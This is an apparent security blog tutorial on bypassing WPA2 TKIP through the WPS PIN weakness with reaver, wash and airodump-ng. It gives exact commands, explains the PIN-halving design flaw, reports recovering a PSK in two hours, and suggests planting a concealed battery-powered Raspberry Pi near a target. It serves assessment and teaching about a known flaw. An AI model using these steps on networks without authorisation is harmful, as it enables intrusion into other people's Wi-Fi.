Ok, someone contacted me recently and said this did not work for TKIP and they couldn’t get it working so this is to show that TKIP can also be bypassed and not just AES when using ‘reaver’. Thanks for the feedback.
See here for the previous lesson on ‘reaver’ and ‘wash’ to bypass WPA2 AES encryption if you want to read more information on this attack.
You should note that this is not actually breaking the WPA2 AES/TKIP encryption algorithms, but is in fact undermining the inherent trust we have in Wi-Fi Protected Setup (WPS), it is here for convenience so that people don’t need to enter in long WPA keys and for that we have introduced a weakness in our current security model and infrastructure that can be broken, very easily.
Think of someone leaving a Raspberry Pi 2 like the one I am using and adding a battery to it, concealing it (or not) in a location near to the access point they need to gain access to. The battery will last for a lot longer than required for the assessment and also gets rid of the risk required with the on-line attack, automate the whole process and you don’t need to do anything else to it, you can also do this for normal wireless assessments that don’t have WPS.
Anyway, first configure your router as follows:Start monitor mode with airmon-ng, you don’t actually require your card to be in monitor mode for this assessment but I like to check the access point details are correct etc so I just do it out of habit.Start airodump to check your access point
airodump-ng mon0 –bssid 00:18:E7:XX:XX:XX -c 6
“airodump-ng” runs airodump-ng
“mon0” is the interface of the card
“–bssid” is for the MAC address of the access point
“-c 6” is to run on channel 6Output of airodump-ng below, something else to note here is that no client is attached to the network we are recovering the WPS PIN from. You do not require any clients to be connected to the access point in order to carry out this attack, you are strictly communicating with the access point.run wash
“wash” runs wash
“-i” is for the interface in which you want to capture packets on which is mon0
“-c” is for the channel to listen on in this case 6
Explaining the output below
BSSID is our target access point MAC address
Channel 6 is the channel of our access point
RSSI is the Received signal strength indication ( A minus is a good thing here 😉
WPS Version which is 1.0
WPS Locked tells you if the access point has been locked due to to many attempts for example
ESSID is the network name of the access pointAs before just run “reaver” from the terminal for a full list of switches available to you
“reaver” runs reaver
“-i” is to select the sniffing interface in this case mon0
“-b” is followed by the target access point MAC address or BSSID
“-vv” is for very verbose output
“-w” is to mimic a Windows 7 registrar
reaver -i mon0 -b 00:18:E7:XX:XX:XX -vv w
Excerpt from Stefan Viehbock’s paper, this explains how the WPS communication process works for design flaw #1 :You only require seven numbers as the last is a checksum and a ‘zero’, once the first four numbers are authenticated you then only require a further three numbers in order to get the correct PIN. This in effect makes the cracking process quite trivial to carry out with very little resources
design flaw #2:
The bruteforce attack then allows you to determine the PIN with a live attack over the air as a received ‘EAP-NACK’ will help you to determine whether the PIN is correct or not in only 11,000 attempts. The ‘EAP-NACK’ helps you to determine if the first or second part of the PIN is correct or not as when you receive an ‘EAP-NACK’ after an M4 or M6 it means it is incorrect and it is therefore unauthenticated.So when you look at the output from reaver below you may see it differently now:I left it to run for the night againThe total time was 2 hours 01 minute or ‘7250 seconds’ as you can see above, we can also see the PIN, PSK and AP SSID above which is the sign of success!
The reaver WPS attack may not work against all access point’s and you may run into issues. I tried this on my Netgear too and it timed out on me after a certain number of attempts, this needs to be researched further but you just need to play around with the pin attempts per second and play with some other options to get it to work, it’s also good to note that reaver will actually save your previous attempts so you can even break the PIN over a few day’s if you need to space out your assessment for any reason. It’s not a good idea to have a ‘burned in’ eight digit PIN as an access method to any system, especially if it’s an easier method to access a system than a big long passphrase which allows you to bypass WPA/2 encryption and do so in a fraction of the time compared to trying to crack the passphrase after you capture the four way handshake, even then you either need a good word-list or a cloud service to try and crack the unknown faster than you would otherwise.